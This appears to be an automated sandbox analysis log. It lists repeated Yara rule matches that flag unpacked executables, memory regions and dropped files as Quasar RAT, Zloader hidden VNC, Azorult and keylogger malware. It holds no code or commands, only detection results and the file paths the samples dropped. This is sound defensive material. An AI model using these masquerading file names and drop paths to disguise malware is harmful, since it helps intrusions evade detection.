Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C7D800 CreateDesktopA,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,lstrcpyA,CloseDesktop,

5_2_00C7D800

System Summary:

Malicious sample detected (through community Yara rule)

Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
